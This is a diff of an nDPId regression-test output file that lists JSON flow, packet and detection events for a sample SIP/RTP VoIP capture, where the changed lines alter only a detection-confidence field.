01338{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1120469590259,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":722,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":722,"pkt_l4_len":688,"thread_ts_msec":1120469590259,"pkt":"ADBUADRWAODtAW69CABFAALEaaEAAIARFsjAqAEC1PIhIxPEE8QCsIioUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMTQ5NTA1MTc4LTQzOGM1MjhiMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPThlOTQ4YjANClRvOiA8c2lwOnZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9OWM3ZDJkYmQ4ODIyMDEzYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDY5IFJFR0lTVEVSDQpDb250ZW50LUxlbmd0aDogMA0KQXV0aG9yaXphdGlvbjogRGlnZXN0IHVzZXJuYW1lPSJ2b2kxODA2MyIscmVhbG09InNpcC5jeWJlcmNpdHkuZGsiLHVyaT0ic2lwOjE5Mi4xNjguMS4yIixub25jZT0iMTcwMWFmNTY2YmUxODIwNzAwODRjNmY3NDA3MDZiYiIsb3BhcXVlPSIxNzAxYTEzNTFmNzA3OTUiLG5jPSIwMDAwMDAwMSIscmVzcG9uc2U9ImJkNzlmZWNhZTYwMGEyZWI3OWQzN2VjNzMyMTQ4MzBiIg0KTWF4LUZvcndhcmRzOiA3MA0KVXNlci1BZ2VudDogTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuMC41MS4xNg0KDQo="} -00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":12,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1120469572844,"flow_last_seen":1120469847809,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":5362,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1120469847809,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00674{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1120469572844,"flow_last_seen":1120470032084,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8957,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1120470032084,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":12,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1120469572844,"flow_last_seen":1120469847809,"flow_idle_time":200000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":5362,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1120469847809,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1120469572844,"flow_last_seen":1120470032084,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8957,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1120470032084,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1120470049188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470049188,"pkt":"ADBUADRWAODtAW69CABFAANSam4AAIARyuzAqAECyER4URPEE8QDPvKbSU5WSVRFIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2lwLmJydXJqdWxhLm5ldD47dGFnPTY0MzNlZjkNClRvOiA8c2lwOjk3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDUwOTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgSU5WSVRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NkcA0KQ29udGVudC1MZW5ndGg6IDI3Mg0KQ29udGFjdDogPHNpcDo4MTY2NjZAMTkyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllFLCBSRUZFUiwgT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQUyAxMDUwMTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLjE2OC4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRwbWFwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgRzcyNi0zMi84MDAwDQphPXJ0cG1hcDozIEdTTS84MDAwDQphPWZtdHA6OTcgbW9kZT0yMA0KYT1zZW5kcmVjdg0K"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":200000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"thread_ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 01527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1120470049696,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470049696,"pkt":"ADBUADRWAODtAW69CABFAANSanAAAIARyurAqAECyER4URPEE8QDPvKbSU5WSVRFIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2lwLmJydXJqdWxhLm5ldD47dGFnPTY0MzNlZjkNClRvOiA8c2lwOjk3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDUwOTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgSU5WSVRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NkcA0KQ29udGVudC1MZW5ndGg6IDI3Mg0KQ29udGFjdDogPHNpcDo4MTY2NjZAMTkyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllFLCBSRUZFUiwgT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQUyAxMDUwMTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLjE2OC4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRwbWFwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgRzcyNi0zMi84MDAwDQphPXJ0cG1hcDozIEdTTS84MDAwDQphPWZtdHA6OTcgbW9kZT0yMA0KYT1zZW5kcmVjdg0K"} 01527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1120470050699,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"thread_ts_msec":1120470050699,"pkt":"ADBUADRWAODtAW69CABFAANSanIAAIARyujAqAECyER4URPEE8QDPvKbSU5WSVRFIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2lwLmJydXJqdWxhLm5ldD47dGFnPTY0MzNlZjkNClRvOiA8c2lwOjk3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDUwOTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgSU5WSVRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NkcA0KQ29udGVudC1MZW5ndGg6IDI3Mg0KQ29udGFjdDogPHNpcDo4MTY2NjZAMTkyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllFLCBSRUZFUiwgT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQUyAxMDUwMTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLjE2OC4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRwbWFwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgRzcyNi0zMi84MDAwDQphPXJ0cG1hcDozIEdTTS84MDAwDQphPWZtdHA6OTcgbW9kZT0yMA0KYT1zZW5kcmVjdg0K"} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":44,"source":"sip.pcap","alias":"nDPId-test","packets-captured":44,"packets-processed":43,"total-skipped-flows":0,"total-l4-payload-len":17733,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":2,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1120470187658} -00674{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":46,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572844,"flow_last_seen":1120470216689,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8987,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1120470216689,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120470235521,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120470315341,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":60,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1120469572844,"flow_last_seen":1120470402627,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":14281,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":46,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572844,"flow_last_seen":1120470216689,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8987,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1120470216689,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120470235521,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":57,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":200000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1120470315341,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":60,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1120469572844,"flow_last_seen":1120470402627,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":14281,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":69,"source":"sip.pcap","alias":"nDPId-test","packets-captured":69,"packets-processed":68,"total-skipped-flows":0,"total-l4-payload-len":27248,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":5,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":20,"global_ts_msec":1120470796804} -00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":71,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1120469572844,"flow_last_seen":1120470796941,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":19440,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00676{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":71,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1120469572844,"flow_last_seen":1120470796941,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":19440,"flow_avg_l4_payload_len":373,"midstream":0,"thread_ts_msec":1120470796941,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1120470985348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985348,"pkt":"ADBUADRWAODtAW69CABFAADIa\/wAAIARFmjAqAEC1PIhJHUwncgAtBjegAhvrgAABNg3lstx1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1REEHBgYEhIeEBQXahMcGAQEBQYBAQAHBQUZEwUbGRATGQUEBAcDAgMDAAACDQ0NAAEDDQwNAAABAgMBBgYBDw4ODAMABwYAAwMGBwEEBgYbHxwRaWBiFREQFGoTFWBpYX10UltZ10dcVlJVREtCdVlzeFp8bmgUag=="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1120470985348,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1120470985418,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985418,"pkt":"ADBUADRWAODtAW69CABFAADIa\/0AAIARFmfAqAEC1PIhJHUwncgAtL+rgAhvrwAABXg3lstxbmgVFGoUFBVpYG5qbG5kbGoWF2xubWBmfn9Fxsnw\/Ofz+uXwy\/H2z83k+sJTdF9CW\/bw8vzg7pfo8ldaT011Z399ZmV0dUN4S0dVQ2dmbWNsZGZkeGRvbxQUbBcRExAXEBwfHRAQFhAQHxwfGR4YEBcSFGxibWNqFRUXbmV3ckDQ93N9fmJnYmoVahcVZUNxWll+YGZ6cnJJZXpgeF1EQg=="} 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1120470985421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1120470985421,"pkt":"ADBUADRWAODtAW69CABFAADIa\/4AAIARFmbAqAEC1PIhJHUwncgAtNyMgAhvsAAABhg3lstxcX5wdtbF0Et0dn92T1BB0VhmZ2V\/Z294Y2ZmahQXFhQREBAVb2ZPemVlYWJoYE9\/YWZkcnV4bWwVFRVqZ2xpYn94ZmBnY2F0zfjXdmNiYXhveHJgaW5jUFlwZW1kYWdlamoREhAQEx4fHx0XahRvRl1F3V5ESdbQxFFR39TfQXR\/Z9L15ebs6JeW7+DslJOU6uqUn5CcnJKX+Ofs5+Hg6g=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470986363,"flow_last_seen":1120470986363,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1120470986363,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30001,"dst_port":40393,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"sip.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1120470986363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1120470986363,"pkt":"ADBUADRWAODtAW69CABFAACEbAUAAIARFqPAqAEC1PIhJHUxnckAcCyBgMgABjeWy3FCyQfKXvrGAwAAJMMAAAAJAAAGDIHKAAs3lstxAR0xMTg5NDI5Ny00NDMyYTlmOEAxOTIuMTY4LjEuMgYFU0lQUFMAAIHLAAY3lstxEHNlc3Npb24gc2h1dGRvd24AAAA="} 